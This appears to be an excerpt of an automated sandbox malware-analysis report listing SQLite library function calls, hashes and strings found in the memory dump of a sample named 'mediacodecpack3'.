                                                                                            • Opcode ID: 8a4e51d2763d1baa8146902d495da2ef892242416c9706ebfa3093aedc646825
                                                                                            • Instruction ID: 6b7ea73e19bc996eb6a422b8fcf26663d3cb25e4dd91ceba81a4d6a678ae72ab
                                                                                            • Opcode Fuzzy Hash: 8a4e51d2763d1baa8146902d495da2ef892242416c9706ebfa3093aedc646825
                                                                                            • Instruction Fuzzy Hash: 2CF2CF74A152288FDB54CF68C980B9EBBF2BF69304F1185A9E888A7341D774ED85CF41
                                                                                            APIs
                                                                                            • sqlite3_value_text.SQLITE3 ref: 6096A64C
                                                                                            • sqlite3_value_bytes.SQLITE3 ref: 6096A656
                                                                                            • sqlite3_strnicmp.SQLITE3 ref: 6096A682
                                                                                            • sqlite3_strnicmp.SQLITE3 ref: 6096A6BC
                                                                                            • sqlite3_mprintf.SQLITE3 ref: 6096A6F9
                                                                                            • sqlite3_malloc.SQLITE3 ref: 6096A754
                                                                                            • sqlite3_step.SQLITE3 ref: 6096A969
                                                                                            • sqlite3_free.SQLITE3 ref: 6096A9AC
                                                                                            • sqlite3_finalize.SQLITE3 ref: 6096A9BB
                                                                                            • sqlite3_strnicmp.SQLITE3 ref: 6096B04A
                                                                                              • Part of subcall function 6096A38C: sqlite3_bind_int.SQLITE3 ref: 6096A3DE
                                                                                              • Part of subcall function 6096A38C: sqlite3_step.SQLITE3 ref: 6096A435
                                                                                              • Part of subcall function 6096A38C: sqlite3_reset.SQLITE3 ref: 6096A445
                                                                                            • sqlite3_value_int.SQLITE3 ref: 6096B241
                                                                                            • sqlite3_malloc.SQLITE3 ref: 6096B270
                                                                                            • sqlite3_bind_null.SQLITE3 ref: 6096B2DF
                                                                                            • sqlite3_step.SQLITE3 ref: 6096B2EA
                                                                                            • sqlite3_reset.SQLITE3 ref: 6096B2F5
                                                                                            • sqlite3_value_int.SQLITE3 ref: 6096B43B
                                                                                            • sqlite3_value_text.SQLITE3 ref: 6096B530
                                                                                            • sqlite3_value_bytes.SQLITE3 ref: 6096B576
                                                                                            • sqlite3_free.SQLITE3 ref: 6096B5F4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_stepsqlite3_strnicmp$sqlite3_freesqlite3_mallocsqlite3_resetsqlite3_value_bytessqlite3_value_intsqlite3_value_text$sqlite3_bind_intsqlite3_bind_nullsqlite3_finalizesqlite3_mprintf
                                                                                            • String ID: optimize
                                                                                            • API String ID: 1540667495-3797040228
                                                                                            • Opcode ID: ab382b16e3f59fac809a38361d516dac1e6c4c02a096abfb60effccae4f38c9b
                                                                                            • Instruction ID: 15d53f9c7948a495e2c6926a79545eea34293df74e7a3e63ea56b3727437b729
                                                                                            • Opcode Fuzzy Hash: ab382b16e3f59fac809a38361d516dac1e6c4c02a096abfb60effccae4f38c9b
                                                                                            • Instruction Fuzzy Hash: 54B2F670A142198FEB14DF68C890B9DBBF6BF68304F1085A9E889AB351E774DD85CF41
                                                                                            APIs
                                                                                            • sqlite3_finalize.SQLITE3 ref: 60966178
                                                                                            • sqlite3_free.SQLITE3 ref: 60966183
                                                                                            • sqlite3_value_numeric_type.SQLITE3 ref: 609661AE
                                                                                            • sqlite3_value_numeric_type.SQLITE3 ref: 609661DE
                                                                                            • sqlite3_value_text.SQLITE3 ref: 60966236
                                                                                            • sqlite3_value_int.SQLITE3 ref: 60966274
                                                                                            • memcmp.MSVCRT ref: 6096639E
                                                                                              • Part of subcall function 60940A5B: sqlite3_malloc.SQLITE3 ref: 60940AA1
                                                                                              • Part of subcall function 60940A5B: sqlite3_free.SQLITE3 ref: 60940C1D
                                                                                            • sqlite3_mprintf.SQLITE3 ref: 60966B51
                                                                                            • sqlite3_mprintf.SQLITE3 ref: 60966B7D
                                                                                              • Part of subcall function 609296AA: sqlite3_initialize.SQLITE3 ref: 609296B0
                                                                                              • Part of subcall function 609296AA: sqlite3_vmprintf.SQLITE3 ref: 609296CA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_freesqlite3_mprintfsqlite3_value_numeric_type$memcmpsqlite3_finalizesqlite3_initializesqlite3_mallocsqlite3_value_intsqlite3_value_textsqlite3_vmprintf
                                                                                            • String ID: ASC$DESC$x
                                                                                            • API String ID: 4082667235-1162196452
                                                                                            • Opcode ID: 7264e4280a4ba67b830c3238f8418230a53be4a89f04bb086879d88682624c0f
                                                                                            • Instruction ID: 01f4316cc9c65235d83944c747b96ccca9397e1276bdc6c450b31a73d7ca280a
                                                                                            • Opcode Fuzzy Hash: 7264e4280a4ba67b830c3238f8418230a53be4a89f04bb086879d88682624c0f
                                                                                            • Instruction Fuzzy Hash: AD921274A14319CFEB10CFA9C99079DBBB6BF69304F20816AD858AB342D774E985CF41
                                                                                            APIs
                                                                                            • sqlite3_bind_int64.SQLITE3(?,?), ref: 609693A5
                                                                                            • sqlite3_step.SQLITE3(?,?), ref: 609693B0
                                                                                            • sqlite3_column_int64.SQLITE3(?,?), ref: 609693DC
                                                                                              • Part of subcall function 6096A2BD: sqlite3_bind_int64.SQLITE3 ref: 6096A322
                                                                                              • Part of subcall function 6096A2BD: sqlite3_step.SQLITE3 ref: 6096A32D
                                                                                              • Part of subcall function 6096A2BD: sqlite3_column_int.SQLITE3 ref: 6096A347
                                                                                              • Part of subcall function 6096A2BD: sqlite3_reset.SQLITE3 ref: 6096A354
                                                                                            • sqlite3_reset.SQLITE3(?,?), ref: 609693F3
                                                                                            • sqlite3_malloc.SQLITE3(?), ref: 60969561
                                                                                            • sqlite3_malloc.SQLITE3(?), ref: 6096958D
                                                                                            • sqlite3_step.SQLITE3(?), ref: 609695D2
                                                                                            • sqlite3_column_int64.SQLITE3(?), ref: 609695EA
                                                                                            • sqlite3_reset.SQLITE3(?), ref: 60969604
                                                                                            • sqlite3_realloc.SQLITE3(?), ref: 609697D0
                                                                                            • sqlite3_realloc.SQLITE3(?), ref: 609698A9
                                                                                              • Part of subcall function 609129D5: sqlite3_initialize.SQLITE3(?,?,?,60915F55,?,?,?,?,?,?,00000000,?,?,?,60915FE2,00000000), ref: 609129E0
                                                                                            • sqlite3_bind_int64.SQLITE3(?,?), ref: 609699B8
                                                                                            • sqlite3_bind_int64.SQLITE3(?), ref: 6096934D
                                                                                              • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                                            • sqlite3_bind_int64.SQLITE3(?,?), ref: 60969A6A
                                                                                            • sqlite3_step.SQLITE3(?,?), ref: 60969A75
                                                                                            • sqlite3_reset.SQLITE3(?,?), ref: 60969A80
                                                                                            • sqlite3_free.SQLITE3(?), ref: 60969D41
                                                                                            • sqlite3_free.SQLITE3(?), ref: 60969D4C
                                                                                            • sqlite3_free.SQLITE3(?), ref: 60969D5B
                                                                                              • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                                              • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                                              • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_bind_int64$sqlite3_freesqlite3_resetsqlite3_step$sqlite3_column_int64sqlite3_mallocsqlite3_realloc$sqlite3_column_intsqlite3_initializesqlite3_mprintfsqlite3_mutex_leavesqlite3_prepare_v2
                                                                                            • String ID:
                                                                                            • API String ID: 961572588-0
                                                                                            • Opcode ID: c724daf3936d67fd3e7a59374d144345718a9f8d9c21f3c7abba70c9fa35c0f4
                                                                                            • Instruction ID: dba6eef834311e7f80380fc62c490a647dd1765b4da9a7e0a506f520bf28697a
                                                                                            • Opcode Fuzzy Hash: c724daf3936d67fd3e7a59374d144345718a9f8d9c21f3c7abba70c9fa35c0f4
                                                                                            • Instruction Fuzzy Hash: 9872F275A042298FDB24CF69C88078DB7F6FF98314F1586A9D889AB341D774AD81CF81
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_bind_int64sqlite3_mutex_leavesqlite3_stricmp
                                                                                            • String ID: 2$foreign key$indexed
                                                                                            • API String ID: 4126863092-702264400
                                                                                            • Opcode ID: efb0247afb620838301bdf32ec29a55ffab8ab84c5461d6934eb6e15b590f11f
                                                                                            • Instruction ID: 3d5d194cd292e354de8359ea213fef7e5121ae3f60f7d2d7ba557b44893e8b9c
                                                                                            • Opcode Fuzzy Hash: efb0247afb620838301bdf32ec29a55ffab8ab84c5461d6934eb6e15b590f11f
                                                                                            • Instruction Fuzzy Hash: 6BE1B374A142099FDB04CFA8D590A9DBBF2BFA9304F21C129E855AB754DB35ED82CF40
                                                                                            APIs
                                                                                            • sqlite3_bind_int64.SQLITE3 ref: 6094A72B
                                                                                            • sqlite3_step.SQLITE3 ref: 6094A73C
                                                                                            • sqlite3_column_blob.SQLITE3 ref: 6094A760
                                                                                            • sqlite3_column_bytes.SQLITE3 ref: 6094A77C
                                                                                            • sqlite3_malloc.SQLITE3 ref: 6094A793
                                                                                            • sqlite3_reset.SQLITE3 ref: 6094A7F2
                                                                                            • sqlite3_free.SQLITE3(?), ref: 6094A87C
                                                                                              • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_bind_int64sqlite3_column_blobsqlite3_column_bytessqlite3_freesqlite3_mallocsqlite3_mutex_entersqlite3_resetsqlite3_step
                                                                                            • String ID:
                                                                                            • API String ID: 2794791986-0
                                                                                            • Opcode ID: 324244e72ed1eb068e97444324dd06558e7f5640642cd65f7376e38a8826fd77
                                                                                            • Instruction ID: 088d5e00ded46b3eb5457b54e5d33bc48436a4b712d77f6ae5dc1ca3eb859b7b
                                                                                            • Opcode Fuzzy Hash: 324244e72ed1eb068e97444324dd06558e7f5640642cd65f7376e38a8826fd77
                                                                                            • Instruction Fuzzy Hash: BE5110B5A042058FCB04CF69C48069ABBF6FF68318F158569E858AB345D734EC82CF90
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_stricmp
                                                                                            • String ID: USING COVERING INDEX $DISTINCT$ORDER BY
                                                                                            • API String ID: 912767213-1308749736
                                                                                            • Opcode ID: 5e6ae8a77223c4cf3853263767bd84c2ef0a0cb2633a4755bdfaa367f33b2fd5
                                                                                            • Instruction ID: 4f43644a9add5c5df618cbd47cd61ce2203d262f2077f605e752fe25420d36ab
                                                                                            • Opcode Fuzzy Hash: 5e6ae8a77223c4cf3853263767bd84c2ef0a0cb2633a4755bdfaa367f33b2fd5
                                                                                            • Instruction Fuzzy Hash: 2412D674A08268CFDB25DF28C880B5AB7B3AFA9314F1085E9E8899B355D774DD81CF41
                                                                                            APIs
                                                                                            • sqlite3_bind_int64.SQLITE3 ref: 6094B488
                                                                                            • sqlite3_step.SQLITE3 ref: 6094B496
                                                                                            • sqlite3_reset.SQLITE3 ref: 6094B4A4
                                                                                            • sqlite3_bind_int64.SQLITE3 ref: 6094B4D2
                                                                                            • sqlite3_step.SQLITE3 ref: 6094B4E0
                                                                                            • sqlite3_reset.SQLITE3 ref: 6094B4EE
                                                                                              • Part of subcall function 6094B54C: memmove.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,6094B44B), ref: 6094B6B5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_bind_int64sqlite3_resetsqlite3_step$memmove
                                                                                            • String ID:
                                                                                            • API String ID: 4082478743-0
                                                                                            • Opcode ID: 967f7dd55d0e0ed5657609aa573e07de9c17706341fbe9ef37ba536950e7892f
                                                                                            • Instruction ID: 9e7f29540a3c6f2d28ce6b101cd1a975f5529a8f599b89b7128c34d749e8d9ce
                                                                                            • Opcode Fuzzy Hash: 967f7dd55d0e0ed5657609aa573e07de9c17706341fbe9ef37ba536950e7892f
                                                                                            • Instruction Fuzzy Hash: DD41D2B4A087018FCB50DF69C484A9EB7F6EFA8364F158929EC99CB315E734E8418F51
                                                                                            APIs
                                                                                            • sqlite3_mutex_enter.SQLITE3 ref: 6094D354
                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 6094D546
                                                                                              • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905D8B
                                                                                              • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905DA4
                                                                                              • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905DB8
                                                                                            • sqlite3_stricmp.SQLITE3 ref: 6094D3DA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_stricmp$sqlite3_mutex_entersqlite3_mutex_leave
                                                                                            • String ID: BINARY$INTEGER
                                                                                            • API String ID: 317512412-1676293250
                                                                                            • Opcode ID: a7efc97792d1e6a4bc5cda92ab6d03f9066f32250883ff14ac0274f07e3e06bf
                                                                                            • Instruction ID: cace79839434994537c0410bddb438ad3d501bddbf1b20fcc6a8a8bdb5da7fdd
                                                                                            • Opcode Fuzzy Hash: a7efc97792d1e6a4bc5cda92ab6d03f9066f32250883ff14ac0274f07e3e06bf
                                                                                            • Instruction Fuzzy Hash: 8E712978A056099BDB05CF69C49079EBBF2BFA8308F11C529EC55AB3A4D734E941CF80
                                                                                            APIs
                                                                                            • sqlite3_bind_int64.SQLITE3 ref: 6094B582
                                                                                            • sqlite3_step.SQLITE3 ref: 6094B590
                                                                                            • sqlite3_column_int64.SQLITE3 ref: 6094B5AD
                                                                                            • sqlite3_reset.SQLITE3 ref: 6094B5EE
                                                                                            • memmove.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,6094B44B), ref: 6094B6B5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: memmovesqlite3_bind_int64sqlite3_column_int64sqlite3_resetsqlite3_step
                                                                                            • String ID:
                                                                                            • API String ID: 2802900177-0
                                                                                            • Opcode ID: f7dd783d858009ac2aa36dfb06bc3a4e86bc75c1920f7d1bf53ec4d0fe99899e
                                                                                            • Instruction ID: fa681a173a9aa7ad5377a8f3376375fc0286f70c891b696e42c92f52458a3a0e
                                                                                            • Opcode Fuzzy Hash: f7dd783d858009ac2aa36dfb06bc3a4e86bc75c1920f7d1bf53ec4d0fe99899e
                                                                                            • Instruction Fuzzy Hash: 0B517D75A082018FCB14CF69C48169EF7F7FBA8314F25C669D8499B318EA74EC81CB81
                                                                                            APIs
                                                                                            • sqlite3_mutex_enter.SQLITE3 ref: 6093F443
                                                                                              • Part of subcall function 60904396: sqlite3_mutex_try.SQLITE3(?,?,?,60908235), ref: 609043B8
                                                                                            • sqlite3_mutex_enter.SQLITE3 ref: 6093F45C
                                                                                              • Part of subcall function 60939559: memcmp.MSVCRT ref: 60939694
                                                                                              • Part of subcall function 60939559: memcmp.MSVCRT ref: 609396CA
                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 6093F8CD
                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 6093F8E3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcmpsqlite3_mutex_entersqlite3_mutex_leave$sqlite3_mutex_try
                                                                                            • String ID:
                                                                                            • API String ID: 4038589952-0
                                                                                            • Opcode ID: 29e5932b9866e1e5e2fcd92ac707fe98724786dada8c9b11deae4621e05e1fb7
                                                                                            • Instruction ID: 916146ddc5613ce70bfe97dc7fabc38680eb49f4f4fdba01105907ea2da9c682
                                                                                            • Opcode Fuzzy Hash: 29e5932b9866e1e5e2fcd92ac707fe98724786dada8c9b11deae4621e05e1fb7
                                                                                            • Instruction Fuzzy Hash: 87F13674A046158FDB18CFA9C590A9EB7F7AFA8308F248429E846AB355D774EC42CF40
                                                                                            APIs
                                                                                              • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                                              • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                                              • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                                            • sqlite3_bind_int.SQLITE3 ref: 6096A3DE
                                                                                              • Part of subcall function 609256E5: sqlite3_bind_int64.SQLITE3 ref: 60925704
                                                                                            • sqlite3_column_int.SQLITE3 ref: 6096A3F3
                                                                                            • sqlite3_step.SQLITE3 ref: 6096A435
                                                                                            • sqlite3_reset.SQLITE3 ref: 6096A445
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_bind_intsqlite3_bind_int64sqlite3_column_intsqlite3_freesqlite3_mprintfsqlite3_prepare_v2sqlite3_resetsqlite3_step
                                                                                            • String ID:
                                                                                            • API String ID: 247099642-0
                                                                                            • Opcode ID: 64427881e425bd4a7d2fa305579facb0dd1ab8a71ce9f1271cd8f49c57a97bec
                                                                                            • Instruction ID: 69535c0605dcb565d56369453fd68d3a3097adfd173720c6e67b3d4aca8354ad
                                                                                            • Opcode Fuzzy Hash: 64427881e425bd4a7d2fa305579facb0dd1ab8a71ce9f1271cd8f49c57a97bec
                                                                                            • Instruction Fuzzy Hash: FF2151B0A143148BEB109FA9D88479EB7FAEF64308F00852DE89597350EBB8D845CF51
                                                                                            APIs
                                                                                              • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                                              • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                                              • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                                            • sqlite3_bind_int64.SQLITE3 ref: 6096A322
                                                                                              • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                                            • sqlite3_step.SQLITE3 ref: 6096A32D
                                                                                            • sqlite3_column_int.SQLITE3 ref: 6096A347
                                                                                              • Part of subcall function 6091D4F4: sqlite3_value_int.SQLITE3 ref: 6091D50C
                                                                                            • sqlite3_reset.SQLITE3 ref: 6096A354
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_bind_int64sqlite3_column_intsqlite3_freesqlite3_mprintfsqlite3_mutex_leavesqlite3_prepare_v2sqlite3_resetsqlite3_stepsqlite3_value_int
